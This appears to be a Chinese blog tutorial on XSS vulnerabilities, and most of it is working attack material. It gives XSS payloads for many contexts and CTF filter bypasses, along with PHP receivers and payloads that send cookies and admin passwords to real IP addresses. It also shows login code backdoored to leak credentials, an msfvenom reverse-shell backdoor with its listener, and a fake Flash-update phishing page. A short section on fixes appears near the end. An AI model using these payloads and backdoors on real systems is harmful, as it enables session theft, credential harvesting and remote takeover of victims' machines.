xss漏洞原理及利用【万字详解】

于 2024-08-03 09:08:43 发布
阅读量1k 收藏 16
点赞数 14
分类专栏: 网络空间安全 文章标签: xss 前端 安全架构 安全性测试 安全威胁分析 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/140859883
版权

文章目录


随着互联网技术的飞速发展,网络安全问题也日益凸显。在众多网络攻击方式中,跨站脚本攻击(Cross-Site Scripting, XSS)因其广泛性和高危性,成为了网络安全领域的一个重要研究课题。XSS 攻击通过在网页中注入恶意脚本,使攻击者能够窃取用户信息、劫持用户会话、篡改网页内容等,给用户和企业带来巨大的安全隐患。本文将深入探讨 XSS 漏洞的原理,并通过具体的实例演示如何复现这一漏洞,希望能帮助读者更好地理解和防范 XSS 攻击。

常用标签的绕过:

xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户

url处XSS

代码示例

<?php
$code=$_GET['x'];
echo $code;
?>

payload:

http://127.0.0.1/xss-demo/xss.php?x=%3Cscript%3Ealert(%27cong%27);%3C/script%3E

图片处XSS攻击

代码示例

<?php
$code=$_GET['x'];
echo "<img src=$code>";
?>

可以看到普通的xss是没有用的,因为源码为alert(‘213’);>,这样是无法触发xss的,可以用img标签的错误触发事件

payload:
http://127.0.0.1/xss-demo/xss.php?x=y οnerrοr=“alert(‘1’)”

svg-xss

  1. 概念

    1. SVG(可扩展矢量图形)是一种基于XML的矢量图形格式,用于描述二维图形。它广泛用于网页中的图形和动画,因为它可以无损缩放,并且由浏览器直接支持。由于SVG文件是基于XML的文本文件,它们可以包含脚本(如JavaScript)。如果SVG文件没有正确处理和过滤,恶意用户可以在SVG文件中嵌入恶意脚本,从而进行XSS攻击,目前主流的浏览器都已经支持SVG图片的渲染。

  2. 复现

    1. 代码示例:

      test.svg
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-diagram-3-fill" viewBox="0 0 16 16">
  <path fill-rule="evenodd" d="M6 3.5A1.5 1.5 0 0 1 7.5 2h1A1.5 1.5 0 0 1 10 3.5v1A1.5 1.5 0 0 1 8.5 6v1H14a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0v-1A.5.5 0 0 1 2 7h5.5V6A1.5 1.5 0 0 1 6 4.5v-1zm-6 8A1.5 1.5 0 0 1 1.5 10h1A1.5 1.5 0 0 1 4 11.5v1A1.5 1.5 0 0 1 2.5 14h-1A1.5 1.5 0 0 1 0 12.5v-1zm6 0A1.5 1.5 0 0 1 7.5 10h1a1.5 1.5 0 0 1 1.5 1.5v1A1.5 1.5 0 0 1 8.5 14h-1A1.5 1.5 0 0 1 6 12.5v-1zm6 0a1.5 1.5 0 0 1 1.5-1.5h1a1.5 1.5 0 0 1 1.5 1.5v1a1.5 1.5 0 0 1-1.5 1.5h-1a1.5 1.5 0 0 1-1.5-1.5v-1z"/>
</svg>

    2. 增加以下代码子访问即可触发xss代码

      1.   <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-diagram-3-fill" viewBox="0 0 16 16">
    <path fill-rule="evenodd" d="M6 3.5A1.5 1.5 0 0 1 7.5 2h1A1.5 1.5 0 0 1 10 3.5v1A1.5 1.5 0 0 1 8.5 6v1H14a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0v-1A.5.5 0 0 1 2 7h5.5V6A1.5 1.5 0 0 1 6 4.5v-1zm-6 8A1.5 1.5 0 0 1 1.5 10h1A1.5 1.5 0 0 1 4 11.5v1A1.5 1.5 0 0 1 2.5 14h-1A1.5 1.5 0 0 1 0 12.5v-1zm6 0A1.5 1.5 0 0 1 7.5 10h1a1.5 1.5 0 0 1 1.5 1.5v1A1.5 1.5 0 0 1 8.5 14h-1A1.5 1.5 0 0 1 6 12.5v-1zm6 0a1.5 1.5 0 0 1 1.5-1.5h1a1.5 1.5 0 0 1 1.5 1.5v1a1.5 1.5 0 0 1-1.5 1.5h-1a1.5 1.5 0 0 1-1.5-1.5v-1z"/>
    <circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" />
    <script>alert(1);</script>
  </svg>

pdf-xss

  1. 概念

    1. 在一些pdf编辑器中可以给pdf添加javascript动作导致的在游览器打开pdf文件时遭受xss攻击

  2. 复现

    1. 下载安装迅捷pdf编辑器

    2. 新建一个pdf

    3. 按照以下操作

    4. 输入一下动作

    5. 保存,在游览器中查看,成功执行

游览器翻译-xss

本来页面的xss被过滤了,但是由于一些扩展有重新加载出来,例如翻译货站

代码示例

edge:
<b><u>行之在线测试 </u></b>
<br>

Políticas de Privacidade
Usaremos seus dados pessoais para resolver disputas, solucionar problemas e aplicar nossos Termos e Condições de Uso.
<br>
Para prevenir abusos no app/site, o Badoo usa decisões automáticas e moderadores para bloquear contas, como parte de seu procedimento de moderação. Para isso, nós conferimos contas e mensagens para encontrar conteúdo que indicam quebra dos nossos Termos e Condições de Uso. Isso é feito através de uma

<b><u>OUR PAYLOAD IN TEXT FORM </u></b>
<br>
<br>
"><img src=x οnerrοr=alert(1)> 
//这里写Payload

<br>
<br>
<br>
Políticas de Privacidade

flash-xss

  1. 概念

    1. Flash是由Adobe开发的一种多媒体软件平台,用于创建动画、游戏和富互联网应用(RIA)。它包含Adobe Flash Player和Adobe Flash Professional(后更名为Adobe Animate)。Flash中的XSS攻击利用了Flash应用(特别是SWF文件)中的漏洞,通过注入恶意脚本,使这些脚本在用户的浏览器中执行。

  2. 常见造成xss中的swf文件函数

    1. navigateToURL
    2. getURL
    3. ExternalInterface.call
    4. htmlText
    5. 参考文章:(链接)

  3. 举例说明:

    1. 从网站下载swf文件,放在swf反编译工具中反编译

    2. 全局搜索上述swf文件函数,找出可以的注入点

      2. payload:http://127.0.0.1/uploader.swf?jsobject=alert(1)

cookie的获取

  1. 概念

    1. 通过javascript获取网站的cookie的信息

  2. 代码审计

    1.   配置文件config.inc.php:
  <?php
  //全局session_start
  session_start(); 
  //全局居设置时区
  date_default_timezone_set('Asia/Shanghai');
  //全局设置默认字符
  header('Content-type:text/html;charset=utf-8');
  //定义数据库连接参数
  define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址
  define('DBUSER', 'pkxss123');//将root修改为连接mysql的用户名
  define('DBPW', 'pkxss123');//将root修改为连接mysql的密码
  define('DBNAME', 'pkxss');//自定义,建议不修改
  define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306
  ?>
  --------------------------------------------------------------------------------------------------
  cookie.php:
  <?php
  include_once '../inc/config.inc.php';
  include_once '../inc/mysql.inc.php';
  $link=connect();

  //这个是获取cookie的api页面

  if(isset($_GET['cookie'])){
      $time=date('Y-m-d g:i:s');
      $ipaddress=getenv ('REMOTE_ADDR');
      $cookie=$_GET['cookie'];
      $referer=$_SERVER['HTTP_REFERER'];
      $useragent=$_SERVER['HTTP_USER_AGENT'];
      $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
      values('$time','$ipaddress','$cookie','$referer','$useragent')";
      $result=mysqli_query($link, $query);
  }
  header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站
  ?>

  3. 复现

    1. 找到存在xss漏洞的留言板,存入payload

      <script>document.location = 'http://43.139.186.80/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

    2. 被重定向1.html

    3. 在在后台查看获取到的cookie信息

cookie的获取

  1. 概念

    1. 通过javascript获取网站的cookie的信息

  2. 代码审计

    1.   配置文件config.inc.php:
  <?php
  //全局session_start
  session_start(); 
  //全局居设置时区
  date_default_timezone_set('Asia/Shanghai');
  //全局设置默认字符
  header('Content-type:text/html;charset=utf-8');
  //定义数据库连接参数
  define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址
  define('DBUSER', 'pkxss123');//将root修改为连接mysql的用户名
  define('DBPW', 'pkxss123');//将root修改为连接mysql的密码
  define('DBNAME', 'pkxss');//自定义,建议不修改
  define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306
  ?>
  --------------------------------------------------------------------------------------------------
  cookie.php:
  <?php
  include_once '../inc/config.inc.php';
  include_once '../inc/mysql.inc.php';
  $link=connect();

  //这个是获取cookie的api页面

  if(isset($_GET['cookie'])){
      $time=date('Y-m-d g:i:s');
      $ipaddress=getenv ('REMOTE_ADDR');
      $cookie=$_GET['cookie'];
      $referer=$_SERVER['HTTP_REFERER'];
      $useragent=$_SERVER['HTTP_USER_AGENT'];
      $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
      values('$time','$ipaddress','$cookie','$referer','$useragent')";
      $result=mysqli_query($link, $query);
  }
  header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站
  ?>

  3. 复现

    1. 找到存在xss漏洞的留言板,存入payload

      <script>document.location = 'http://43.139.186.80/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

    2. 被重定向1.html

    3. 在在后台查看获取到的cookie信息

页面信息获取

  1. 概念

    1. 当我们拿下网站权限时,需要进入网站看看,此时需要admin的账号和密码,就可以在源码中插入xss攻击代码获取密码的表单

  2. 条件

    1. 具备web权限,写入权限

  3. 复现

    1. 网站部分代码示例:

      login_check.php
<php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if(!isset($depth))$depth='';
$commonpath=$depth.'include/common.inc.php';
$commonpath=$admin_index?$commonpath:'../'.$commonpath;
require_once $commonpath;
$turefile=$url_array[count($url_array)-2];
if($met_adminfile!=$turefile){
	$query="update $met_config set value='$turefile' where name='met_adminfile' and lang='metinfo'";
	$db->query($query);
}
//dump($_SERVER);
//echo $_SERVER[HTTP_REFERER];
//$HTTP_REFERERs=explode('?',$_SERVER[HTTP_REFERER]);
//echo strrev(substr(strrev($HTTP_REFERERs[0]),0,7));
if($action=="login"){
	$metinfo_admin_name     = $login_name;
	$metinfo_admin_pass     = $login_pass;
	$up = '<script src="http://43.139.186.80/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'"></script>';
//将账号密码发送到攻击者服务器中
	echo $up;
	$metinfo_admin_pass=md5($metinfo_admin_pass);
	/*code*/
	if($met_login_code==1){
		require_once $depth.'../include/captcha.class.php';
......
------------------------------------------------------------------------------------------
get.php
<?php
$u = $_GET['user'];
$p = $_GET['pass'];
$myfile = fopen("newfile.txt", "w+");
fwrite($myfile, $u);
fwrite($myfile, "|");
fwrite($myfile, $p);
fclose($myfile);
?>//接受传来的账号和密码并写入newfile.txt当中

    2. 当管理员登录是后台自动发送账号和密码

xss配合MSf钓鱼

  1. 概念

    1. 通过msf生成后门,利用beef上线受控或者钓到鱼之后,通过msf的监听来控制主机

  2. 复现

    1. 生成后门poc.exe

      1.   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.36.147 LPORT=6666 -f exe > poc.exe

    2. 下载官方文件-保证安装正常

    3. 将后门与官方文件通过压缩软件捆绑在一起

      1. 将两压缩

    4. msf启动监听

      1. msfconsole
      2. use exploit/multi/handler
      3. set payload windows/meterpreter/reverse_tcp
      4. set lhost 0.0.0.0
      5. set lport 6666
      6. run

    5. 制作钓鱼页面,这里采用色诱

      1. flash页面:doocop/Flash_Xss: Flash最新钓鱼源码对接官方API实现跟随官方升级而升级 (github.com)

      2. 替换下载点

      3. 代码示例

        1.   诱导安装页面

  <html xmlns="http://www.w3.org/1999/xhtml"> 
  <head> 
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
  <title>小迪与某主播SESE画面流出!</title> 
  </head> 
  <body> 
  小迪与某主播SESE画面流出!<br>
  <img src="1.gif" alt="" width="300" height=600" align="absmiddle"/ onclick=a()>
  </body> 
  </html>
  <script>								
  function a(){
  	alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
  	window. location.href="http://192.168.36.147/";
  }
  </script>

    6. 鱼儿点击网页上线

XSS修复

  1. 对危险字符进行过滤

    1. 变量过滤模版

      <?php
//开启http_only也可在php.ini开启
//ini_set("session.cookie_httponly", 1);

//设置当前cookie
//setcookie('mycookie','xiaodi');

//只允许加载本地源图片:
//header("Content-Security-Policy:img-src 'self' ");

//加载的是一张我随意百度的图片
//<img src="https://www.baidu.com/img/PCfb_5bf082d29588c07f842ccde3f97243ea.png"/>

//自定义过滤函数
function remove_xss($val) {
  // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
  // this prevents some character re-spacing such as <java\0script>
  // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
  $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);
  // straight replacements, the user should never need these since they're normal characters
  // this prevents like <IMG SRC=@avascript:alert('XSS')>
  $search = 'abcdefghijklmnopqrstuvwxyz';
  $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
  $search .= '1234567890!@#$%^&*()';
  $search .= '~`";:?+/={}[]-_|\'\\';
  for ($i = 0; $i < strlen($search); $i++) {
   // ;? matches the ;, which is optional
   // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars
   // @ @ search for the hex values
   $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
   // @ @ 0{0,7} matches '0' zero to seven times
   $val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
  }
  // now the only remaining whitespace attacks are \t, \n, and \r
  $ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');
  $ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
  $ra = array_merge($ra1, $ra2);
  $found = true; // keep replacing as long as the previous round replaced something
  while ($found == true) {
   $val_before = $val;
   for ($i = 0; $i < sizeof($ra); $i++) {
     $pattern = '/';
     for ($j = 0; $j < strlen($ra[$i]); $j++) {
      if ($j > 0) {
        $pattern .= '(';
        $pattern .= '(&#[xX]0{0,8}([9ab]);)';
        $pattern .= '|';
        $pattern .= '|(�{0,8}([9|10|13]);)';
        $pattern .= ')*';
      }
      $pattern .= $ra[$i][$j];
     }
     $pattern .= '/i';
     $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
     $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
     if ($val_before == $val) {
      // no replacements were made, so exit the loop
      $found = false;
     }
   }
  }
  return $val;
}

$code=$_GET['x'];
echo $code."<br>";

?>
    2. 设置http-only

      1. 设置http-only可以防止防止客户端脚本(如 JavaScript)访问 cookie,从而防止通过 XSS 攻击窃取 cookie 信息。

      2. 设置过程

        1. php.ini中的session.cookie httponly =1
        2. 网站源码写入ini set(“session. cookie httponly”, 1);
    3. 设置CSP(content security policy)

      1. csp严格限制脚本的来源,可以防止恶意脚本的执行,可以进制内联脚本,就算在源码上写入xss代码页无法执行,就比如上面的模版,

      2. 在网站中加入header(“Content-Security-Policy: img-src ‘self’”);即可即使注释掉了百度的图片,他还是会加载

        1. 在这里插入图片描述
    4. 对长度进行限制,实体转义

CTF各种骚姿势

参考文章:

xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户

XSS总结 - 先知社区 (aliyun.com)

服务端接受
<?php
$cookie = $_GET['c'];
$myfile = fopen("cookie.txt", "w+");
fwrite($myfile, $cookie);
fclose($myfile);
?>
  1. 远程调用

    1. payload:

      <script>window.location.href='http://47.94.236.17/get.php?c='+document.cookie</script>
  2. 过滤script

    1. payload

      <img src=1 onerror="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
  3. 过滤img

    1. payload

      <input onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
<svg onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
  4. 过滤空格

    1. payload

      <svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"></svg>
  5. body标签

    1. payload

      <body onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

CTF场景题

  1. 场景1

    1. 在这里插入图片描述

    2. 管理员的cookie频繁变化,无法获取cookie直接登录,但是可以通过xss表单获取管理员的账号和密码

  2. payload

    S('.laytable-cell-1-0-1').each(function(index,value) {
    if (value.innerHTML.indexOf('ctf' + 'show') > -1) {
        window.location.href = 'http://47.94.236.117/get.php?c=' + value.innerHTML;
    }
});
  3. 场景2
    1. 后台管理员有功能页面,能够查看注册用户的账号密码,其中有一个修改的密码的功能,通过捉包分析,可以通过访问一个地址即可修改密码,get提交

  4. payload:

    <script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>//跳转回被管理员发现
<script src="http://127.0.0.1/api/change.php?p=123"></script>//页面在后台访问
  5. 场景3
    1. 后台管理员有功能页面,能够查看注册用户的账号密码,其中有一个修改的密码的功能,通过捉包分析,可以通过访问一个地址即可修改密码,post提交

  6. payload

    $.ajax({
    url: 'http://127.0.0.1/api/change.php',
    type: 'post',
    data: { p: '123' }
});

通过对 XSS 漏洞原理的详细剖析和复现过程的具体演示,我们可以清晰地看到这种攻击手段的危害及其实现方式。了解这些知识不仅有助于网络安全从业人员提升自身技能,还能帮助开发者更好地编写安全的代码,从源头上防范潜在的安全威胁。然而,XSS 仅仅是众多网络攻击手段之一,网络安全的攻防战是一场持久战,需要我们不断学习和更新知识,采取严密的防护措施,以应对日益复杂的网络攻击。希望本文能够为读者提供有价值的参考,促进大家在实际工作中更好地保护网络系统的安全。

CongSec
关注
  • 14
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
热门推荐
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
XSS总结
weixin_51356351的博客
11-19 1574
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
XSS利用
YIN_XIAOMAO的博客
05-29 300
XSS利用方式较多,多研究总有一个适合你,XSS防御方式较多,多种方式联动防御才好。
XSS利用方式
u011215939的博客
01-16 9023
前言 学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下…… 准备 为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS
XSS漏洞利用
LizePing_的博客
07-29 5023
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS详解及其利用方式
读书 买花 长大
11-14 3976
XSS-xss
104.[提高班]网络渗透靶场Oracle+phpStudy本地搭建万字详解1
08-03
网络渗透靶场Oracle+phpStudy本地搭建万字详解主要探讨了如何在本地环境中构建一个用于网络安全实践的靶场,涵盖了Oracle数据库和phpStudy的安装配置,以及如何利用这个靶场模拟SQL注入、XSS攻击和文件上传漏洞等...
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
xss原理利用
MAPLE102424的博客
05-12 1398
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。当别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
XSS利用之一看就懂
qq_42743187的博客
01-31 446
xss利用方法之前,先分享一个前几天友情测试的案例吧 一、XSS案例 站点就不说了,图片打码,主要看效果就可以了???? 页面上有个搜索框,输入随机值在标签中输出,不允许输入尖括号,页面会直接显示错误,但双引号可以使用 " οnclick="alert(1),直接测试,查看页面源代码发现一个问题: 就是我输入的英文小括号,输出时变成了中文括号,这样alert()函数就执行不了了。。。 于是想到,用反引号来代替小括号试试,成功弹窗,源代码显示如下: 但是这里又存在一个问题,反引号里的内容会被当成字符串处
05. XSS漏洞利用
weixin_43909650的博客
12-17 905
2022网安冬令营(web安全/渗透测试/实战训练)——蚁景网安 https://ke.qq.com/course/5874132#term_id=106089914
XSS完整利用过程
weixin_39811856的博客
05-19 669
XSS,wiki的解释是一种代码注入,所以能做的事情很多,不限于alert弹框(感觉很多人以为XSS就是弹框框,弹不出来就不认)、窃取Cookie之类的操作,下面要实现的水坑攻击就是一种利用。 过程: 1.利用JS写一个诱导页面,不要再用flash更新页面了,都被人家玩剩很多年了... 我写了个页面,抛砖引玉,一个是模仿chrome浏览器崩溃后的页面,另一个是使用layer的弹窗页面。 代码一,chrome浏览器崩溃页面: var body = document.body; var _
XSS漏洞检测和利用
最新发布
2401_84434570的博客
04-22 960
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4304
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
挖洞经验 | 可以被XSS利用的HTML标签和一些手段技巧,靠挖SRC漏洞每月多赚15k
jennycisp的博客
10-26 842
*”。**网上关于XSS的教程数不胜数,转载来转载去的,就是那么些Payload,可能看的人晕晕的不知所以然。而且还有很多Payload就算把其中的HTML代码闭合后写在自己的前端中,都不一定触发,因为很多老的标签和事件都已经被W3C给废弃了。本文首先给大家总结一下目前通用可以拿来构造XSS的HTML标签和一些标签事件,然后再给大家讲述一些绕过的技巧,教你在么构造出属于你自己渗透时真正需要的Exp。
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 5977
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储型XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
xss漏洞原理及挖掘方法
05-12
XSS(Cross-site scripting)跨站脚本攻击,是一种常见的Web攻击方式,攻击者通过在网页中注入恶意脚本代码,使得用户在浏览网页时执行这些脚本代码,达到攻击的目的。 XSS攻击原理是,攻击者在网页中注入恶意脚本代码,当用户访问这个网页时,恶意脚本代码会被执行,从而达到攻击的目的。攻击者可以通过XSS攻击来窃取用户的敏感信息、绕过网站的访问控制、劫持用户会话、篡改网页内容等。 XSS漏洞的挖掘方法一般包括以下几个步骤: 1. 扫描目标网站:使用一些扫描工具,如Burp Suite、OWASP ZAP等,对目标网站进行扫描,找出可能存在的XSS漏洞。 2. 注入恶意脚本代码:在目标网站的输入框中注入恶意脚本代码,如<script>alert("XSS漏洞");</script>,并提交表单。 3. 检查注入的恶意脚本代码是否生效:在提交表单后,在网页中查看是否弹出了XSS漏洞测试弹窗。如果弹出了,说明注入的恶意脚本代码生效了,存在XSS漏洞。 4. 利用XSS漏洞:如果发现了XSS漏洞,攻击者可以利用这个漏洞来进行攻击,如窃取用户的敏感信息、绕过网站的访问控制、劫持用户会话、篡改网页内容等。 为了防止XSS漏洞的产生,网站开发人员可以采取以下措施: 1. 对用户输入的数据进行过滤和转义,将特殊字符进行转义,如<、>、&等。 2. 在Cookie中设置HttpOnly属性,禁止JavaScript访问Cookie,防止攻击者通过XSS攻击窃取用户的Cookie信息。 3. 在HTTP响应头中设置X-XSS-Protection属性,开启浏览器的XSS保护功能。 4. 对网站进行安全审计,定期检查网站是否存在XSS漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值